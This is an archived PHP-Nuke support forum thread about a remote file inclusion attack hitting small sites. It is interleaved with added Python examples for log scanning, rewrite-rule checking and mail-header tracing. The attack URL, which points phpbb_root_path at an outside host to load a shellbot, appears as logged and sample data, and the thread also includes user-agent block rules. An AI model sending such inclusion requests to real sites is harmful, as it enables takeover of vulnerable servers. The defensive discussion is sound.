Ravens PHP Scripts: Forums
Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
selma
Hangin' Around
Joined: May 09, 2006
Posts: 31
PostPosted: Thu Jun 14, 2007 6:48 pm

Does anyone know what this is?

Just an information question, since my updated NS blocked about 30 attacks with the following string today, using different IPs.

This is the string, with the domain left off, since this is my oldest site and it seems to attract every type of malicious intent. It's just a non-profit festival site, nothing involving money, though it has always had a problem with email hijackers sending pump-and-dumps, watch sales and viagra mail, until the recent upgrade. Not sure if it's over, but quiet so far.

Query
//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.freewebtown.com/sclipici/evilx??

Get String: //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.freewebtown.com/sclipici/evilx??

Post String:
//modules/Forums/admin/admin_styles.php



And ...

My forums module is inactive. Without Sentinel, could this query have worked?


Ok, one more...

What type of exploit or attack is this used for?


Thanks in advance,

Selma
 
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
PostPosted: Thu Jun 14, 2007 8:52 pm

It's a standard "Remote File Inclusion" ... this is a known exploit against older versions of phpNuke and it's being used by numerous botnets. The script itself allows the hacker to check for vulnerabilities and load a shellbot script to connect to his botnet. If successful, he can use the compromised machine to target others.

_________________
- Star Wars Rebellion Network -

Need help? Nuke Patched Core, Coding Services, Webmaster Services 
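The remote file inclusion evaders99 describes leaves a recognisable trace in the web server's access log: a query parameter whose value is itself a URL, which a vulnerable include() then fetches over HTTP. The following scanner is an added example, not code from this thread or from NukeSentinel. It parses Apache combined-format log lines, flags any parameter carrying a URL, rates the hit "high" when the parameter is a known include path (phpbb_root_path, from the string quoted above), and counts attempts per client address. The log lines, client addresses and the attacker.example host are constructed for the demonstration.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Apache "combined" log format: ip ident user [time] "method target proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A parameter value carrying a URL scheme is what remote file inclusion needs:
# the vulnerable include() concatenates the value and PHP fetches it over HTTP.
URL_SCHEME_RE = re.compile(r'(?i)(?:https?|ftp)://')

# Parameter names known to be used as include paths. phpbb_root_path is the one
# from this thread; extend the set from advisories for the software you run.
INCLUDE_PARAMS = {"phpbb_root_path"}

# Constructed sample log. Line 1 mirrors the admin_styles.php string quoted in the
# thread (attacker host replaced by attacker.example), line 2 is a normal forum
# view, line 3 mirrors the later scanner-style request with a URL buried in "f".
SAMPLE_LOG = """\
10.0.0.5 - - [14/Jun/2007:18:40:01 -0600] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://attacker.example/evilx?? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
10.0.0.6 - - [14/Jun/2007:18:41:13 -0600] "GET /modules.php?name=Forums&file=viewforum&f=1 HTTP/1.1" 200 8213 "-" "Mozilla/5.0"
10.0.0.7 - - [04/Jul/2007:14:20:07 -0600] "GET /modules.php?name=Forums&file=posting&mode=newtopic&f=1+[PLM=0]+GET+http://www.mysite/modules.php?name=Forums HTTP/1.0" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
"""


def scan_line(line):
    """Return a list of findings for one access-log line (empty if benign or unparseable)."""
    m = LOG_RE.match(line.strip())
    if not m:
        return []
    # Split on the first "?" ourselves: a target starting with "//" confuses urlsplit.
    _path, _sep, query = m.group("target").partition("?")
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if not URL_SCHEME_RE.search(value):
            continue
        if value.lower().startswith(("http://", "https://", "ftp://")):
            kind = "remote-url-value"   # the whole value is a remote URL
        else:
            kind = "embedded-url"       # a URL buried inside the value (scanner trace)
        severity = "high" if name in INCLUDE_PARAMS else "medium"
        findings.append({
            "ip": m.group("ip"), "param": name, "value": value,
            "kind": kind, "severity": severity, "ua": m.group("ua"),
        })
    return findings


def scan_log(text):
    """Run scan_line over every non-empty line of a log file."""
    return [f for line in text.splitlines() if line.strip() for f in scan_line(line)]


def count_by_ip(findings):
    """Attempts per client address; the thread reports ~30 hits from many IPs in a day."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['severity']:6} {f['ip']:10} {f['param']}={f['value']!r}  ua={f['ua']}")
    print(dict(count_by_ip(hits)))
```

The scanner is deliberately content-based: it looks at what the request asks for, not at who claims to be sending it, so it still fires when the client lies about its user agent. Feed it your real access log with `scan_log(open("access_log").read())`.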
selma
PostPosted: Fri Jun 15, 2007 9:16 am

Thanks for that answer, Evaders99

If I'm not careful, I could get addicted to NS and how it works.

But I guess in the wide world of addictions, that one wouldn't be so bad.

Have a good day

Selma
 
evaders99
PostPosted: Fri Jun 15, 2007 6:07 pm

Block libwww-perl using .htaccess and that will take out 99.9% of these attempts Smile
 
Gremmie
Former Moderator in Good Standing
Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA
PostPosted: Fri Jun 15, 2007 6:31 pm

This is what I use for that. I have this at the bottom of my .htaccess file:

Quote:

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$ [ Only registered users can see links on this board! Get registered or login! ] [R,L]


I tested it by writing a perl script that tries to browse my site and it worked. Smile

_________________
GCalendar - An Event Calendar for PHP-Nuke
Member_Map - A Google Maps Nuke Module 
selma
PostPosted: Fri Jun 15, 2007 8:16 pm

I really can't believe how helpful everyone is around here.

A couple of years ago, I paid more than $600 for a program that the developer installed - in the wrong folder, so it wouldn't work. I had to stay up 'til midnight every night for about three weeks to catch them to continually do fixes, because they were based in India. The code was all encrypted and I finally just scrapped it for another program.

You all are WAAAAAYYYYYY better than them!

Thanks Very Happy Selma
 
wiz
Involved
Joined: Oct 09, 2006
Posts: 413
Location: UK
PostPosted: Fri Jun 15, 2007 9:25 pm

Always search what you can for free, then you will inevitably come across goldmine websites like this one.
 
montego
Site Admin
Joined: Aug 29, 2004
Posts: 9457
Location: Arizona
PostPosted: Sat Jun 16, 2007 1:35 pm

Just remember that it costs someone, Raven, money to run this site. If we don't support him through donations, these doors end up closing too. Every little bit helps. He, and others here, helped me out a lot too when I first started and so I became "hooked". Now, I get a chance to do my part by helping others too.

_________________
Where Do YOU Stand?
HTML Newsletter::ShortLinks::Mailer::Downloads and more... 
elric
New Member
Joined: Jun 15, 2007
Posts: 13
PostPosted: Sat Jun 16, 2007 2:17 pm

Gremmie wrote:
This is what I use for that. I have this at the bottom of my .htaccess file:

Quote:

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$ [ Only registered users can see links on this board! Get registered or login! ] [R,L]


I tested it by writing a perl script that tries to browse my site and it worked. Smile


I have been getting these attacks for the last week or so. Would the following .htaccess be the correct way of adding your code?
Code:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/[0-9]\.[0-9]*
RewriteRule ^.*$ http://127.0.0.1 [R,L]
RewriteCond %{HTTP_HOST} !^www\.
RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 200.150.35.165
deny from 69.243.47.54
deny from 68.34.112.209
deny from 71.114.62.162
deny from 69.243.44.134
deny from 69.243.45.51
deny from 24.55.180.176
deny from 71.114.65.115
deny from 208.31.155.254
deny from 82.146.165.139

RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/[0-9]\.[0-9]*
RewriteRule ^.*$ http://127.0.0.1 [R,L]


Also, I hope you don't mind, but is there any chance you could allow me a copy of your script? I'd like to test mine.

Wink
 
Gremmie
PostPosted: Sat Jun 16, 2007 9:15 pm

Well I dunno if yours will work or not since I barely understand the rewrite engine...

But here is the Perl script. I got it from the 'net somewhere...

Code:

#!/usr/bin/perl
# Simple LWP browser for testing a user-agent block rule.
# LWP::UserAgent sends "libwww-perl/<version>" as its User-Agent by default,
# which is exactly what the .htaccess RewriteCond above matches on.
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;

my $ua = LWP::UserAgent->new;

my $req = HTTP::Request->new(GET => 'http://www.yoursite.com/');
$req->header('Accept' => 'text/html');

# send request
my $res = $ua->request($req);

# check the outcome
if ($res->is_success)
{
   print $res->content;
}
else
{
   print "Error: " . $res->status_line . "\n";
}
 
elric
PostPosted: Sun Jun 17, 2007 1:35 pm

Thanks

Been searching around and found this .htaccess generator, it does not do everything but it's pretty neat. [ Only registered users can see links on this board! Get registered or login! ]

I have also now uncovered more questions. How do I incorporate the above and also the Sentinel code?

So far I have this
Code:
RewriteEngine On

RewriteCond %{HTTP_HOST} !^www\.
RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]

RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$ http://127.0.0.1 [R,L]

<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 200.150.35.165
deny from 69.243.47.54
deny from 68.34.112.209
deny from 71.114.62.162
deny from 69.243.44.134
deny from 69.243.45.51
deny from 24.55.180.176
deny from 71.114.65.115
deny from 208.31.155.254
deny from 82.146.165.139

# -------------------------------------------
# Start of NukeSentinel(tm) admin.php Auth
# -------------------------------------------
<Files .ftaccess>
  deny from all
</Files>

<Files .staccess>
  deny from all
</Files>

<Files admin.php>
   <Limit GET POST PUT>
      require valid-user
   </Limit>
   AuthName "Restricted"
   AuthType Basic
   AuthUserFile   /path/to/your/.staccess
</Files>

# -------------------------------------------
# Start of NukeSentinel(tm) DENY FROM area
# -------------------------------------------


Can anyone with more knowledge than me (that's not hard) tell me if they can see any errors?
 
selma
PostPosted: Tue Jun 19, 2007 9:19 am

montego wrote:
Just remember that it costs someone, Raven, money to run this site. If we don't support him through donations, these doors end up closing too. Every little bit helps. He, and others here, helped me out a lot too when I first started and so I became "hooked". Now, I get a chance to do my part by helping others too.


Glad you brought up that point, Montego. I've been thinking about that for the past couple of days.

I see that Raven asks for a combined total of 400 a month... Which is a pittance IMO.

I have to admit to being a spastic donator, once every few months or so. But I mentioned somewhere else that since starting my first for profit site, I intend to include RN in the monthly budget as a regular expense.

If there are 15,000 users plus and a third are regular users...

What would a good "support" donation be? Support to the point that the ecommerce module and some other major revision work that's talked about on the forum could be done?

During those couple of days referred to earlier, this thought's been running through my mind.

A donation from a few people of $50 adds up to a couple hundred dollars.

But... suppose "someone" (church lingo for "the person who suggested it") organized a type of pledge drive based on the fact that thousands of people use the scripts and tools and many actually depend on what you do to keep their start ups running efficiently.

Then suppose that 5,000 of the 15,000 would agree to pledge $5 per month.

Going a step beyond your donation mod, there could be a Supporters Hall where the name of the business or the person could be posted with a link - or something else clever that everyone would be dying to get their name or business posted to... Maybe a "Support Where it Counts" kind of button for webs.

Without getting way off track, 5,000 people at $5 a month is enough to keep a few staff members secure.

I love organizing and I certainly wouldn't mind putting some work into this kind of effort, and I think I still have free time between 5 - 6 am LOL

So, tell me your thoughts.


... And, noob alert:

Code:
RewriteCond %{HTTP_HOST} !^www\.

RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]


What does this part of that code do?

I added the previous three lines of the code from Gremmie the other day, and haven't gotten any more attacks - thank you very much.

I understand what the code does, but I don't know how it does it, if that makes sense - or is that part of your testing code or the cooletips engine coding?

... And

Can you put the "libwww-perl" into the string, or script or referrer blocker in Sentinel?

Thanks in advance,

Selma
 
Gremmie
PostPosted: Tue Jun 19, 2007 9:48 am

It is easy for Perl programmers to forge the user agent. I am now seeing similar attacks on my site. It looks like the same scripts but now the user agent says Mozilla instead of libwww-perl. But Sentinel is stopping them.

That code looks like it is rewriting mysite.com into [ Only registered users can see links on this board! Get registered or login! ]
 
selma
PostPosted: Tue Jun 19, 2007 9:55 am

Got it Smile

Thanks
 
elric
PostPosted: Tue Jun 26, 2007 2:45 pm

Thanks Gremmie,
And thanks for answering my next question before I'd even asked it.
I am no longer seeing the Perl attacks, but like you I have seen about 3 Mozilla/4.0 attacks and, like you say, Sentinel is stopping them.
The latest points to the script below. [ Only registered users can see links on this board! Get registered or login! ]
 
Gremmie
PostPosted: Tue Jun 26, 2007 5:46 pm

It is easy to modify that Perl script to change the user agent part of the header. The LWP module supports that.
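Gremmie's two points above, that the .htaccess rule only matches the agent string and that LWP lets a script change that string, are easy to see side by side in code. The block below is an added Python example, not code from this thread or from the scripts it mentions: it re-implements the two rewrite rules posted earlier (the www redirect and the libwww-perl block) as a pure function and runs constructed requests through them, including the same RFI request sent with LWP's default agent string and with a forged browser string. Hostnames, paths and agent strings are all made up for the demonstration.

```python
import re

# Python equivalents of the two .htaccess rules posted in this thread. Apache
# regexes are case-sensitive unless the rule carries the [NC] flag, and "[R]"
# without an explicit status code means a 302 redirect.
UA_BLOCK_RE = re.compile(r'^libwww-perl')   # RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
WWW_HOST_RE = re.compile(r'^www\.')         # RewriteCond %{HTTP_HOST} !^www\.  (negated)


def apply_rules(host, path, user_agent):
    """Return (action, status, location) as Apache would decide for one request."""
    # RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L]
    if not WWW_HOST_RE.match(host):
        return ("redirect", 301, f"http://www.{host}{path}")
    # RewriteRule ^.*$ http://127.0.0.1 [R,L]
    if UA_BLOCK_RE.match(user_agent):
        return ("redirect", 302, "http://127.0.0.1")
    return ("serve", 200, path)


# Constructed requests: a browser on the bare host, the RFI request with LWP's
# default agent string, the same request with a forged browser string (what the
# thread later sees), and the same tool with a different letter case.
RFI_PATH = "/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://attacker.example/x"
REQUESTS = [
    ("mysite.example",     "/modules.php?name=Forums", "Mozilla/5.0 (X11; Linux x86_64)"),
    ("www.mysite.example", RFI_PATH, "libwww-perl/5.805"),
    ("www.mysite.example", RFI_PATH, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"),
    ("www.mysite.example", RFI_PATH, "LibWWW-Perl/5.805"),
]


def blocked_fraction(requests):
    """(stopped, total) for the requests that carry the RFI payload."""
    attacks = [r for r in requests if "phpbb_root_path=http" in r[1]]
    stopped = [r for r in attacks if apply_rules(*r)[2] == "http://127.0.0.1"]
    return len(stopped), len(attacks)


if __name__ == "__main__":
    for req in REQUESTS:
        print(req[2][:32].ljust(32), apply_rules(*req))
    print("attack requests stopped by the agent rule: %d of %d" % blocked_fraction(REQUESTS))
```

Only one of the three attack requests is stopped: the forged browser string and the differently-cased tool name both walk past the rule. Adding [NC] to the RewriteCond fixes the case problem but not the forgery, since in the Perl script above a single `$ua->agent('...')` call changes what LWP sends. The agent rule is worth keeping as a cheap first filter, but the reliable check is the content-based one (a URL in a query parameter), which is why Sentinel still catches the Mozilla/4.0 variants.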
 
elric
PostPosted: Wed Jul 04, 2007 2:30 pm

And it certainly looks like that has been done. I am not getting any attacks with User Agent: perl, but now I am getting attacks like User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR

About 3 or 4 nearly every day, a lot similar to the following:

Code:
www.mysite/modules.php?name=Forums&file=posting&mode=newtopic&f=1+[PLM=0]+GET+http://www.mysite/modules.php?name=Forums+[0,9018,76382]+->+[L]+POST+http://www.mysite/modules.php?name=Your_Account+[0,0,60072]+->+[N]+GET+http://www.mysite/modules.php?name=Forums&file=viewforum&f=1+[0,0,124857]+->+[N]+GET+http://www.mysite/modules.php?name=Forums&file=posting&mode=newtopic&f=1+[0,43072,59023]+->+[N]+POST+http://www.ffclan.us/modules.php?name=Forums&file=posting+[0,0,37628]

Get String: [ Only registered users can see links on this board! Get registered or login! ] [0,0,37628]&mode=newtopic&f=1 [0,43072,59023] -> [N] POST http://www.mysite/modules.php?name=Forums
Post String: [ Only registered users can see links on this board! Get registered or login! ]

Forwarded For: none
Client IP: none
Remote Address: 65.96.84.33
Remote Port: 1950
Request Method: GET

What I can't understand is why my site seems to be a target, whereas here, for example, has a mere 11 attacks blocked compared to my current 84; my site has way less traffic and I would certainly believe a much lower search engine rating.
Does anyone know how targets are picked? I am guessing via a search engine.
 
selma
PostPosted: Thu Jul 05, 2007 12:44 pm

Quote:
What I can't understand is why my site seems to be a target, where as here for example has a mere 11 attacks blocked compared to my currently 84,


Hey Elric, Thought I was the only one they targeted for no good darn reason. Figured they probably know they can't get into Raven's site.

My site is a local arts organization. Nothing real exciting to want to break into. But one thing I did find out was that spammers especially like to use the address of "trusted" sites to send their mail from. It means fewer bounces for them because the "trusted" address they are spoofing will get through most spam filters - by IP address anyway.

So maybe your search engine theory is right. Good search position = trusted site.?.?

Still can't figure out why anyone else would want to get in though.
 
fkelly
Former Moderator in Good Standing
Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY
PostPosted: Thu Jul 05, 2007 1:44 pm

Quote:
Still can't figure out why anyone else would want to get in though.


Cause they are idiots and don't know or care what they are hacking. They just search for sites randomly and try various forms of attack and if they can hack you they get their jollies. So to speak. Don't try to attribute rationality to it. Just defend yourself as best you can.
 
selma
PostPosted: Thu Jul 05, 2007 3:06 pm

"Cause they are idiots and don't know or care what they are hacking."

Agreed!

They need some kids and bills and stuff. Give em something to do!

Anybody seen this one? Only asking because this site's been getting hit with all types of mail that I know is blocked. Which leads me to believe this sender has access somewhere I can't see.

mail came from ...

Received: from word9 ([127.0.0.1]) by writely.com with Microsoft SMTPSVC(6.0.3790.1830);
Fri, 06 Jul 2007 04:14:56 +0800
Message-Id: <9.0.9.1.3.97943802796608.0[3

No subject, body-message, or return sender in the actual letter. Just a blank mail. And that is the end of the header

Received: from word9 ([127.0.0.1]) This part looks like they are in my control panel and sending from there.

Freaky
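Reading a Received: line like the one above is easier with the pieces named. The parser below is an added example, not code from this thread: it walks the Received: headers of a message in transit order and reports, for each hop, the name the sender announced, the address the receiving server saw, and the server that wrote the line. The address in square brackets is always the one observed by the server named after "by", so a loopback address there means the message was handed to that server by a process on the same machine rather than over the network. The sample message is constructed: its second Received: line is the one quoted above, the first line (the recipient server's own hop) and the Message-Id are made up.

```python
import re
from email import message_from_string

# One hop: "from <helo> (<rdns> [<ip>]) by <server> with <protocol>; <date>"
RECEIVED_RE = re.compile(
    r'from\s+(?P<helo>\S+)'                                      # name the sending side announced
    r'(?:\s+\((?P<rdns>[^\s\[\]()]+)?\s*\[(?P<ip>[^\]]+)\]\))?'  # "(rdns [ip])" or just "([ip])"
    r'\s+by\s+(?P<by>\S+)'                                       # server that wrote this line
    r'(?:\s+with\s+(?P<with>.+?))?'
    r'\s*;\s*(?P<date>.+)$',
    re.S,
)


def parse_hop(value):
    """Parse one Received: header value into its named parts."""
    m = RECEIVED_RE.search(value)
    if not m:
        return {"raw": value.strip(), "parsed": False}
    ip = m.group("ip")
    return {
        "parsed": True,
        "helo": m.group("helo"),
        "ip": ip,
        "by": m.group("by"),
        "with": (m.group("with") or "").strip(),
        "date": m.group("date").strip(),
        # Loopback here means the receiving server ("by") got the message from a
        # local process, i.e. it was submitted on that machine, not from outside.
        "local_submission": ip is not None and (ip == "::1" or ip.startswith("127.")),
    }


def trace_received(raw_message):
    """Hops in transit order (the server that first handled the message comes first).

    Headers are prepended, so the topmost Received: line is the newest. Only the
    line added by your own server is trustworthy: everything below it arrived
    with the message and could have been written by the sender."""
    msg = message_from_string(raw_message)
    return [parse_hop(v) for v in reversed(msg.get_all("Received", []))]


# Constructed sample: the second Received: line is the one quoted in the thread,
# the first hop and the Message-Id are made up.
SAMPLE_MESSAGE = """\
Received: from mail.writely.example ([192.0.2.10]) by mx.mysite.example with ESMTP id ABC123; Fri, 06 Jul 2007 04:15:30 +0800
Received: from word9 ([127.0.0.1]) by writely.com with Microsoft SMTPSVC(6.0.3790.1830);
 Fri, 06 Jul 2007 04:14:56 +0800
Message-Id: <constructed@example.invalid>

"""

if __name__ == "__main__":
    for n, hop in enumerate(trace_received(SAMPLE_MESSAGE), 1):
        print(n, hop)
```

Run against a real message by passing the full raw source (headers and body) to `trace_received`; the last hop in the returned list is the one your own mail server wrote, and that is the only address you can act on with confidence.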
 
Susann
Moderator
Joined: Dec 19, 2004
Posts: 3191
Location: Germany: Moderator German NukeSentinel Support
PostPosted: Thu Jul 05, 2007 3:16 pm

Agreed, most are idiots, especially those script kiddies which just copy and paste some code. I have met different types of them online and talked back.
Most are young and they don't know the difference between crime and fun.
I could write a book about these stories, but I don't publish something like that. It's in my memory; that's enough. Smile
My last meeting was also funny. Someone registered new, and in the meantime, while he was in his store, his friend played with his PC and tried to hack my site.
The newly registered user didn't know why he suddenly couldn't post in my forum anymore after he came back from his store. That's just one little funny story from my board.
But there are others too, and they are really dangerous, because they have the knowledge and the money to do these things like botnets etc.
However, currently iframes are very popular.
For example, google for: hacked by [ Only registered users can see links on this board! Get registered or login! ]

German Nuke sites and phpBB boards have already been hacked by them.
 
elric
PostPosted: Fri Jul 06, 2007 4:30 pm

Thanks for all your posts; for information, I'm now at 94 attacks. I agree with all your comments but I just feel it's more than random.
I have even googled my site url in the hope of finding it posted in a security site with the "bet you can't hack me" type thing but to no avail.
 
selma
PostPosted: Mon Jul 09, 2007 2:58 pm

Posted here: Union + nuke_authors
[ Only registered users can see links on this board! Get registered or login! ]


Last edited by selma on Mon Jul 09, 2007 4:05 pm; edited 1 time in total 
selma
PostPosted: Mon Jul 09, 2007 3:44 pm

posted elsewhere -
 
elric
PostPosted: Fri Jul 13, 2007 2:16 pm

I'm not entirely sure what the link you supplied is telling me, but it did highlight to me some of the comments posted to news topics, which contained spammage of links and all sorts of text. I have deleted these and I hope perhaps this will drop some of the search engines picking up on key words like an*l etc.

Once again Thank you for your help.
 
Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours